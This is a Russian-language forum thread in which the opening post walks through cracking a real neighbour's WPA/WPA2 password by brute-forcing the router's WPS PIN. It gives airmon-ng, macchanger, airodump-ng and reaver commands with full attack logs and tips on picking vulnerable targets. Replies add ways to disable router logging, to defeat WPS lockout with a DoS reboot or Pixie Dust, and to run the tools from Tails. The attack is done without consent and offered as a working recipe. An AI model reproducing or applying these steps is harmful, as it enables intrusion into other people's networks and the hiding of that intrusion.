Die Cyber Wochenschau - взлом WPA/WPA2 PSK через уязвимость WPS - разбор реальной атаки.

  • Автор темы Автор темы PANDORA
  • Дата начала Дата начала

PANDORA

Заместитель Администратора
Команда форума
Администратор
Sweetie Girl
Сообщения
5.020
Реакции
11.401
Die Deutsche Cyber Wochenschau - взлом WPA/WPA2 PSK через уязвимость WPS - разбор реальной атаки.

Взлом роутера как известно возможно реализовать тремя основными стратегиями:

1. Через брутфорс или атаку по словарю 4-way-handshake
2. Через брутфорс пина Wifi Protected Setup (WPS)
3. Через лоха эксплуатацию фишинговых комплексов типа WiFiPhisher или Airgeddon.

Первый способ основан на захвате четырех пакетов аутентификации, которые содержат зашифрованный WPA PSK (Pre Shared Key) ключ или тупо пароль. Второй способ эксплуатирует уязвимость WPS PIN в которой всего 11.000 комбинаций. В мануале к риверу заявлено время от 4 до 10 часов на разъёб роутера. В данном примере на все про все ушло 2 часа 6 минут (в итоге получен И WPS PIN И WPA PSK - двойной профит!). Ну а третий способ - "на лоха". Мне как ТРУЪ кибербойцу обманывать лолю или бабушку стыдно, и трофеями такие пароли я не считаю. Но в патовой ситуации цель оправдывает средства.

Сегодня гайд будет не совсем обычный - разбор реальной успешной атаки на составляющие, которые собственно и сделали ее успешной.

Инструментарий:

Тест был "обкаткой в бою" новой версии флешки ParrotSec # WiFighter 1.0 alfa. Для атаки использовались:

1. Боевой адаптер TP-LINK WN722N v1.0 c антенной 5dBi от ALFA AWUS036NH (которая сгорела как последняя паскуда не отработав и месяца).
2. macchanger 1.7.0-5.3+b1
3. aircrack-ng 1:1.2-0~rc4-2
4. reaver 1.6.3-0kali1
5. треканы от joe ford - самый важный элемент ^^
Barely Alive – Shudder feat Coppa Joe Ford Remix
Culprate & Joe Ford – Gaucho
Joe Ford – Abandoned Art feat Miss Trouble
Joe Ford, Document One – Care for Me
badassmotherfucker-jpg.8409


Рис.1 - Средний танк адаптер TP-LINK WN722N v1.0 c длинноствольной пушкой антенной.

WiFighter mode engage!

Перевод адаптера в боевой режим и маскировка:

Код:
┌─[intruder@parrot]─[~]
└──╼ $ sudo -s

Код:
┌─[root@parrot]─[/home/intruder]
└──╼ # airmon-ng start wlan0 && ifconfig wlan0mon down && macchanger -r wlan0mon && ifconfig wlan0mon up

Поиск целей.

Методом научного тыка проб и ошибок я вяснил следующие нюансы на счет атак через WPS:

1. В графе PWR точки -70 и выше - без шансов. -65 -60 -55 можно пробовать. -50 -45 самое оно.
2. Самые уязвимые - "свистки" - 3G/4G модемы с режимом AP.
3. Если есть TP-LINK, начинать с них однозначно. Чуть менее дырявые HUAWEI и D-Link.
4. В графе WPS в первую очередь нужно искать режим 1.0 ETHER,LAB,PBC

Чтобы иметь всю эту инфу airodump-ng нужно запускать не в "нуб" режиме, а заюзав следующие опции:

Код:
┌─[root@parrot]─[/home/intruder]
└──╼ $ airodump-ng -a --wps --uptime --manufacturer wlan0mon

-a - не включать в список "блудных клиентов" - устройства которые не аутентифицированы на точках доступа (прожожие с мобилами в которых активен wifi адаптер)
--wps - версия wps
--manufacturer - производитель роутера
--uptime - сколько роутер висит онлайн (в каждом маячке, которые спямят роутеры транслируя essid есть данные про это)

С помощью wps мы можем отсеять залоченые роутеры (их можно работать но потея). По uptime можно оценить насколько часто мы сможет потом юзать чужой роутер. Если там аптайм 22 дня значит он 3 недели не вырубался ни днем ни ночью, нормальный ход короче. Производитель нам тоже нужен - выкупить дырявые свистки. Вот такая канитель.

Че? "-а" нафига? Да чтобы список в экран влезал епта. Хотя со злыми адаптерами которые вываливают за 3 секунды на экран от 100 точек и выше это не так критично. Один пёс придется делать 5 шрифт чтобы все влезло. Запускаем сканер:

Screenshot at 2017-11-26 10-42-08.png


Рис.2 Вчерашний терпила. Протестированный роутер.

Список целей рядом со своей временной берлогой я уже знаю на зубок - тусуюсь тут третий месяц. Да и точку я эту уже пробовал работать - но скорострельность тогда была примерно 60-70 секунд на одну попытку. Однако я смог разогнать "Вайфайтера" до 7 секунд/пин, благодаря тому, что:

1. Точка выдавала пограничные -65 dBm. С таким сигналом каждая единичка может решить исход сражения, бывает - 66 dBm еще вывозит адаптер, а -69 dBm уже нет. В диапазоне от- 40 dBm до -50 dBm это уже не так критично.
2. В графе дата за 19 минут аптайма 20 пакетов с данными - владелец не пользуется интернетом в данный момент. Значит меньше палева.
3. WPS 1.0 активен, не залочен, с режимами ETHER,LAB,PBC
4. Роутер TP-LINK - дырявый как жопа пидараса очень уязвим к любым атакам.

Feuer frei!

Тут как то задавали мне вопрос, мол слышь ты, хакер кухонный, мамкин программист - а как ты убираешь ошибки типа:

WPS transaction failed (code: 0x03), re-trying last pin

Да очень просто. Чаще всего для этого достаточно отключить negative-acknowledgement a.k.a. NAK или NACK ( опцией --no-nacks или -N). Команда для ривера тогда будет вот такая:

┌─[root@parrot]─[/home/intruder]
└──╼ $ reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv -N

где:

-i - интерфейс (имя адаптера)
-b - мак атакуемого роутера (из списка целей)
-vv - команда риверу выводить в терминал максимально подродбный лог, а не только важные моменты или ошибки.
-N - отключение сообщениий, которыми обмениваются роутер и адаптер в случае если прошлая команда не выполнена или выполнена с ошибками.

После чего мы увидим отчет о запуске системы вооружения и первых пристрелочных выстрелах:

Код:
┌─[✗]─[root@parrot]─[/home/intruder]
└──╼ #reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv -N

Reaver v1.6.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Switching wlan0mon to channel 11
[+] Received beacon from XX:XX:XX:XX:XX:XX
[+] Vendor: AtherosC (новая фишка в ривере 1.6.3 - производитель чипсета!)
[+] Trying pin "12345670"
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: TP-LINK хххххх)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin "00005678"
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: TP-LINK xxxxxx)

первые результаты:

Код:
[+] Trying pin "22225672"
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: TP-LINK xxxxxx)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 0.05% complete @ 2017-11-25 12:50:59 (7 seconds/pin)

Семь секунд на один пин - такое я даже на картинках в интернетике не видел!

Код:
[+] 4.95% complete @ 2017-11-25 13:54:08 (7 seconds/pin)
[+] Trying pin "05345670"
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: TP-LINK xxxxxx)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response

(тут короче пару страниц унылой байды вырезано)

Код:
[+] Trying pin "05344444"
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: TP-LINK xxxxxx)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 90.95% complete @ XX:XX:XX:XX:XX:XX (7 seconds/pin)

А вот это ключевой момент рывок с 4.95% до 90.95% - ривер пробил основную броню роутера и подобрал первые 4 цифры - 0534ХХХХ. На подбор первых 4 знаков ривер затратил чуть больше часа. Ну а потом добил остальные:

Код:
[+] Trying pin "053452xx"
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: TP-LINK xxxxxx)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] 100.00% complete @ 2017-11-25 14:56:31 (7 seconds/pin)
[+] Pin cracked in 7570 seconds
[+] WPS PIN: '053452xx'
[+] WPA PSK: 'XxxxxXxxxx'
[+] AP SSID: 'TP-LINK xxxxxx'




screenshot-at-2017-11-25-15-15-09-png.8405


Вечером когда терпила уснул проверил пароль. Капитальный красавчик.

Возможные траблы:

Вообще по мануалу ривер запускается командой:
┌─[root@parrot]─[~]
└──╼ $reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv

Этого вполне достаточно, но:

Могут посыпаться ошибки WPS transaction failed (code: 0x03), re-trying last pin, при этом пушка стреляет в молоко и топчется на пине 12345670 не пробуя следующий. Прогресс постоянно 0.00% и никакого прироста (так я провел первый месяц в попугае хахахах). Вот какие варики мне помогли распетлять че к чему:

Военные хитрости которые, которые я распетлял методом научного тыка проб и ошибок.

1. если запускать airodump-ng шмонять по всем 14 каналам то он покажет гораздо меньше точек, чем если прошмонять отдельно каждый канал, так как не успевает хватать все маячки от всех точек. Например у меня аэродамп настроеный на первом канале обнаруживает что 13 вероятных пративников транслируют вражеские радиопередачи на CH 1, а прыгая по всем каналам он видbт всего 9 врагов. Учитывая что каналов 14, потери даже 2 точек на каждом канале в итоге приведут к потере 28 целей.

2. Если точка со станусом wps Locked или же активирует его понимая что с с нее стягивают трусики следует заюзать опцию -L, чтобы адаптер начал игнорировать пакеты "я не такая". Так же юзабельна опция -d 5 (10 20 30 60) - заставляющяя ривера не так активно пробовать пинкоды.

3. Если адаптер теряет точку и начинает прыгать по каналам в процессе шебуршения пин кода - помогает принудительное указание канала -с 6 например тащемта.

4. Чтобы определить где находится вражеский передатчик есть два годных пеленгатора для дроида - WIFIAnalyzer и JAWS. первый показывает примерное расстояние второй имеет функцию "булавочек" чтобы отмечать захваченные в плен точки ^^ Оба есть на православном f-droid.

Screenshot_2017-12-03-18-43-01.png


"Челюсти" и пленные вражеские радиопередающие устройства.

5. После того как вы первый раз подключитесь к роутеру с левым маком не забывайте снимать галочку с "автоконнекта" - иначе при следующем запуске машины адаптер автоматом залогинится к лоху с родным маком.

6. Если ривер не может авторизоваться и чекнуть пинкод - есть вариант запускать его без аутентификации с оцией -А, но тогда в другом терминале нужно делать аутентификацию другим способом, например с помощью aireplay-ng (fake auth или -1).

7. апгрейд антенны реально имеет смысл, но об этом в отдельной статье...
 
Последнее редактирование модератором:
Статья крутая. Я делаю по старинке, может кому пригодится: скачиваю под андройд программу для брутфорса WPS , прям с телефона сканирую сети, выбираю с лучшим сигналом - подбираю пин по базе, либо брутфорсу. Каждая третья сеть ломается на отлично. Потом я захожу в сам роутер (как правило это очень легко, и по базе роутеров можно найти необходимую модель и дефолтные пароли). В настройках роутера уже можно делать всё, что душеньке угодно. Я лично отключаю логирование (хотя хозяин вряд ли туда вообще заходит когда либо). А потом телефон можно подключать к ноуту, раздавать интернет. Примитивно, но очень доступно. Профит.
 
Статья крутая. Я делаю по старинке, может кому пригодится: скачиваю под андройд программу для брутфорса WPS , прям с телефона сканирую сети, выбираю с лучшим сигналом - подбираю пин по базе, либо брутфорсу. Каждая третья сеть ломается на отлично. Потом я захожу в сам роутер (как правило это очень легко, и по базе роутеров можно найти необходимую модель и дефолтные пароли). В настройках роутера уже можно делать всё, что душеньке угодно. Я лично отключаю логирование (хотя хозяин вряд ли туда вообще заходит когда либо). А потом телефон можно подключать к ноуту, раздавать интернет. Примитивно, но очень доступно. Профит.
привет. ты наверное имеешь в виду приложения которые "угадывают" ключи по essid/vendor? насколько я в курсе это прокатывает с узким кругом производителей и при условии что там стоит заводской.
 
Ну, у меня статистика очень добротная) Не претендую, что метод очень хороший, но рабочий.
 
Прочитал с большим интересом, пишите доступно и понятным для неопытного человека языком. Какую ОС порекомендуете для взлома? (Подойдет ли Tails?) Так же хотелось бы уточнить по поводу антенны, какая на ваш взгляд заслуживает внимания?(Спраишваю т.к не уверен, что мощная антенна будет нормально функционировать в савокупности с предложенным вами адаптером)
 
Последнее редактирование:
Прочитал с большим интересом, пишите доступно и понятным для неопытного человека языком. Какую ОС порекомендуете для взлома? (Подойдет ли Tails?) Так же хотелось бы уточнить по поводу антенны, какая на ваш взгляд заслуживает внимания?(Спраишваю т.к не уверен, что мощная антенна будет нормально функционировать в савокупности с предложенным вами адаптером)
привет. как бы странно это не звучало - но для изучения азов хакинга wifi T.A.I.L.S. очень даже подходит по одной просто причине - там "из коробки" уже стоит комплекс aircrack-ng. открой рут терминал и набери там:

Код:
aircrack-ng --help

система в ответ выдаст справку ^^

ривера правда там нет по умолчанию, но тейлс на дебиане и его репозиториях, а там он есть 100%.

для более глубокого изучения нужно что то посерьезнее. kali, parrot security и всякие cyborg hawk не сильно подходят как ни странно. у них "на борту" под 1000 пакетов, из которых для 802.11 дай бог 20-30. новички в них теряются. есть дистро именно для этого - например wifislax.

если же линукс знаешь мало мало то самый годный варик свою сборку запилить с блекджеком и шлюхами. какие пакеты поставить и как настроить могу подсказать всем интересующимся - говно вопрос.

на счет антенны: сегодня третью точку подломил прямо "из дома" не высовывая 722й в окно - при этом точка была около -75 dBm:

ggwp.png


1070 секунд это потому что я запустил эту сессию уже где то с 94%. на самом деле он всю ночь в окно пакетами лупил. разъёб длился часов 12 на скорости 1 выстрел в 30-40 секунд.

п.с. причем тут антенна? да потому что на нем стояла дура с коэффициентом усиления 8dBi. кстати скоро обзор антеннок запилю.
 
Последнее редактирование модератором:
привет. как бы странно это не звучало - но для изучения азов хакинга wifi T.A.I.L.S. очень даже подходит по одной просто причине - там "из коробки" уже стоит комплекс aircrack-ng. открой рут терминал и набери там:

Код:
aircrack-ng --help

система в ответ выдаст справку ^^

ривера правда там нет по умолчанию, но тейлс на дебиане и его репозиториях, а там он есть 100%.

для более глубокого изучения нужно что то посерьезнее. kali, parrot security и всякие cyborg hawk не сильно подходят как ни странно. у них "на борту" под 1000 пакетов, из которых для 802.11 дай бог 20-30. новички в них теряются. есть дистро именно для этого - например wifislax.

если же линукс знаешь мало мало то самый годный варик свою сборку запилить с блекджеком и шлюхами. какие пакеты поставить и как настроить могу подсказать всем интересующимся - говно вопрос.

на счет антенны: сегодня третью точку подломил прямо "из дома" не высовывая 722й в окно - при этом точка была около -75 dBm:

Посмотреть вложение 8526

1070 секунд это потому что я запустил эту сессию уже где то с 94%. на самом деле он всю ночь в окно пакетами лупил. разъёб длился часов 12 на скорости 1 выстрел в 30-40 секунд.

п.с. причем тут антенна? да потому что на нем стояла дура с коэффициентом усиления 8dBi. кстати скоро обзор антеннок запилю.


Прекрасно, что Tails заточена под эти цели.
Практики в данной области не имею, есть только отрывки теории с разных форумов.
Если под словом "сборка" имеется ввиду несколько пакетов, нужных для взлома точки
2. macchanger 1.7.0-5.3+b1
3. aircrack-ng 1:1.2-0~rc4-2
4. reaver 1.6.3-0kali1
Какую сборку можете порекомендовать под Tails для взлома по Вашему методу? Или от меня сейчас требуется только скачать эти пакеты, установить и следовать мануалу?
 
Последнее редактирование:
Прекрасно, что Tails заточена под эти цели.
Прекрасно, что Tails заточена под эти цели.
Практики в данной области не имею, есть только отрывки теории с разных форумов.
Если под словом "сборка" имеется ввиду несколько пакетов, нужных для взлома точки
2. macchanger 1.7.0-5.3+b1
3. aircrack-ng 1:1.2-0~rc4-2
4. reaver 1.6.3-0kali1
Какую сборку можете порекомендовать под Tails для взлома по Вашему методу? Или от меня сейчас требуется только скачать эти пакеты, установить и следовать мануалу?

macchanger & aircrack-ng там есть уже, нет только "разорителя". что бы его установить забей в рут терминал:

Код:
apt update && apt install reaver -y

под сборкой я имел ввиду вот какаую схему:

1. скачиваешь "голый" атакующий дистрибутив. kali light или parrot light например.
2. обновляешь его и ставишь только те пакеты, которые интересны. тебе же не нужны в данный момент пакеты для работы с серверами или для проведения криминалистической экспертизы оперативной памяти, верно? только лишь для изучения стандарта связи 802.11 и смежные (crunch macchanger hashcat etc...)

Попугай получше кали будет. И не потому что я на нем делаю. Наоборот - я на нем делаю потому что он лучше. Если бы лучше был кали - у меня на аватаре был бы логотип кали. Лучше он как минимум вот по каким пунктам:

1. Легче, менее требователен к ресурсам машины.
2. Нет проблем с установкой драйверов для беспроводных адаптеров - на сайте попугая заявлено что в ядре уже есть модули для таких чипсетов как:

Atheros AR9271 (722й тплинк версии/ревизии 1.0)
Ralink RT 2870/3070 (альфа 036NH)
Ralink RT3572
Atheros AR948

от себя могу добавить что лично запускал на ноутбуке с встроенным чипсетом intel centrino wireless N130 - как режим монитора так и тест инъекций - в ближайшую цель залетело 30 снарядов из 30 возможных, так что это вполне себе боевой адаптер, который даже стреляет - правда недалеко ^^

3. кроме пушек есть броня, причем при нормальной настройке помощнее чем у тейлс будет, у тейлс lynis индекс безопасности 58 выдает, а я своего попугая почти до 70 забронировал (верно для версии parrot 3.9 и выше, до нее тейлс покрепче была).

п.с. подчеркну что тейлс подходит для изучения основ. азов. для взлома они не подходит так как этот процесс требует полного контроля над системой и времени. в тейлс нет ни первого (изменять настройки она тебе не даст) ни второго (ревер может вгрызаться в броню роутера четверо суток, при этом он сохраняет сессии на остановке. после перезагрузки можно продолжить атаку с 24% успеха например. поскольку у тейлс память как у аквариумной рыбки (о привет!) о ты каждый раз будешь играть в день сурка, либо будешь вынужден не гасить машину сутками, молясь рядом чтобы ничего не зависло).
 
Сегодня сделал первый тест, закачал ривер на таилс и попробовал сломать ближайшую точку, посыпались ошибки code: 0x02 и пушка стреляла одним и тем же паролем, с нетерпением жду продолжение статьи)
 
А если после минуты работы ривер выдает:
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
Че делать?
 
А если после минуты работы ривер выдает:
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
Че делать?
это wps lockout - один из видов активной защиты точки доступа. вариантов несколько

1. снизить скорость перебора (пауза перед каждой попыткой пина)
2. ждать (только я хз почему балли делает паузу 43 секунды а ривер 60 - на моей практике точки лочатся от получаса и выше)
3. реализовать атаку DoS в результате которой точка уйдет в ребут и очнется без локаута
4. найти друю
5. атаковать "сучкой пикси" которой для брута пина нужны миллисекунды и точка не успеет локнуть впс
 
это wps lockout - один из видов активной защиты точки доступа. вариантов несколько

1. снизить скорость перебора (пауза перед каждой попыткой пина)
2. ждать (только я хз почему балли делает паузу 43 секунды а ривер 60 - на моей практике точки лочатся от получаса и выше)
3. реализовать атаку DoS в результате которой точка уйдет в ребут и очнется без локаута
4. найти друю
5. атаковать "сучкой пикси" которой для брута пина нужны миллисекунды и точка не успеет локнуть впс

Атакую свой роутер (TL841N), WPS не залочен (кстати, после перезагрузки этого роутера лок не пропадает - у меня получилось только руками снять лок, зайдя в роутер):
reaver -i wlan0mon -c 3 -b <> -vv -K
Результат - WPS transaction failed (code: 0x03), re-trying last pin
Если добавляю -N, после неплохого начала и нескольких секунд задумчивости Пикси 1.4 пишет:
[-] WPS pin not found!

Не поделитесь вариантами на этот счет?

И еще вопрос. Допустим, мне как-то удалось узнать/получить WPS точки доступа. Могу ли я каким-то образом получить к ней доступ или каким-то другим образом получить WPA?
 
Последнее редактирование:
Атакую свой роутер (TL841N), WPS не залочен (кстати, после перезагрузки этого роутера лок не пропадает - у меня получилось только руками снять лок, зайдя в роутер):
reaver -i wlan0mon -c 3 -b <> -vv -K
Результат - WPS transaction failed (code: 0x03), re-trying last pin
Если добавляю -N, после неплохого начала и нескольких секунд задумчивости Пикси 1.4 пишет:
[-] WPS pin not found!

Не поделитесь вариантами на этот счет?
у меня по статистике пикси ну максимум 50% точек пин дала. но скорее там даже 40 или 30%. тут вариантов никаких нет или она его сбрутит или нет.
 
у меня по статистике пикси ну максимум 50% точек пин дала. но скорее там даже 40 или 30%. тут вариантов никаких нет или она его сбрутит или нет.

Спасибо. И еще вопросы:
1. Допустим, мне как-то удалось узнать/получить WPS точки доступа. Могу ли я каким-то образом получить к ней доступ или каким-то другим образом получить WPA?
2. Если возможно, подскажите, плиз, полезный ресурс, где почитать о практическом применении mdk3 и wifite.
 
Последнее редактирование:
Спасибо. И еще вопросы:
1. Допустим, мне как-то удалось узнать/получить WPS точки доступа. Могу ли я каким-то образом получить к ней доступ или каким-то другим образом получить WPA?
2. Если возможно, подскажите, плиз, полезный ресурс, где почитать о практическом применении mdk3 и wifite.
ну пикси не дает пароля только пин. но зная пин тебе ничто не мешает провести обычную атаку ривером или балли. только начинать надо не с нуля а с уже известного пина. через пару секунд ривер тебе в зубах впа пск притащит.

п.с. я сегодня вне дома занимался так как уже точки тут кончились. выяснил опытным путем что успех пикси даст атаки зависит скорее всего от ESSID - я так понял она брутит по паре MAC + ESSID и если еесид незаводской то она почти всегда пишет pin not found. Так что старайся атаковать неизмененные точки.
 
3. реализовать атаку DoS в результате которой точка уйдет в ребут и очнется без локаута
Подскажи пожалуйста каким образом можно это сделать?
Только что 3 точки пробывал данным методом "пробить"..
На всех результат:
WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
 
Подскажи пожалуйста каким образом можно это сделать?
Только что 3 точки пробывал данным методом "пробить"..
На всех результат:
WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
способов много, надо уже по ситуации смотреть.

1. найти другую точку - самое простое
2. понизить скорострельность. -d 15 как минимум -d 60-90 как максимум.
3. заюзать вариант ривера который после каждого пина меняет мак адрес
4. заюзать пикси даст атаку которая успевает до локаута пробить точку на стоковый пин

если же нужна конкретная точка то ищи мануалы по DoS атакам. Если в колонке CIPHER стоит TKIP - считай повезло. Такие ребутить не трудно, если CCMP то нужно потеть - ее нагружая. Там и mdk3 и airelay и в идеале второй адаптер нужны. И то нет гарантии что ты сможешь точку уронить в ребут.

Хотя у меня одна точка как то сама постоянно падала - когда я ее просто ривером ковырял. Если запускать airodump c опцией -U или --uptime то там будет колонка с аптаймом. Ребут по ней мониторить надобно. Если точка падает то она сначала пропадает вовсе, а потом возращается с аптаймом 00:00:00 - только нужно следить за каналом - она после ребута может и канал поменять.
 
Извеняюсь,я далеко не специалист во взломах,но если на роутере отключен WPS то метод описанный в данной теме не подойдёт?
 
привет. да, не прокатит. ни ривер ни пикси.
А ты не использовал програмку "Fluxion", если да ,то было бы очень интересно увидеть статью по её использованию.Я пытался поставить её на Кали ,но что то сделал не так и при запуске она выдавала ошибку...
 

Похожие темы

Ты сидишь в кафе, подключаешься к Wi-Fi, открываешь телегу. Рядом за столиком человек с ноутбуком делает то же самое — только он параллельно читает твой трафик, перехватывает куки и собирает хеши паролей от корпоративных сетей в радиусе ста метров. Ему не нужен физический доступ к роутеру, не...
Ответы
14
Просмотры
409
Die Cyber Wochenschau 2 - взлом WEP - разбор реальной ezpz атаки. Взять WEP точку ненамного престижней, чем украсть пароль "лоховоровайкой" - атакой EVIL TWIN. Но ради интереса и опыта я сегодня с утреца решил таки проверить так ли все там просто. На все про все ушло чуть более 30 минут, из...
Ответы
2
Просмотры
Взлом WPA/WPA2 PSK. Часть первая: захват WPA/WPA2 four-way-handshake. Один из способов взлома беспроводной точки доступа WPA/WPA2 PSK является офф-лайн атака по словарю захваченного four-way-handshake, или "рукопожатие". Что такое four-way-handshake - тема для отдельной стататьи, для наших...
Ответы
25
Просмотры
20К
Взлом WPA/WPA2 PSK. Часть первая: захват WPA/WPA2 four-way-handshake. Один из способов взлома беспроводной точки доступа WPA/WPA2 PSK является офф-лайн атака по словарю захваченного four-way-handshake, или "рукопожатие". Что такое four-way-handshake - тема для отдельной стататьи, для наших...
Ответы
21
Просмотры
19К
Назад
Сверху Снизу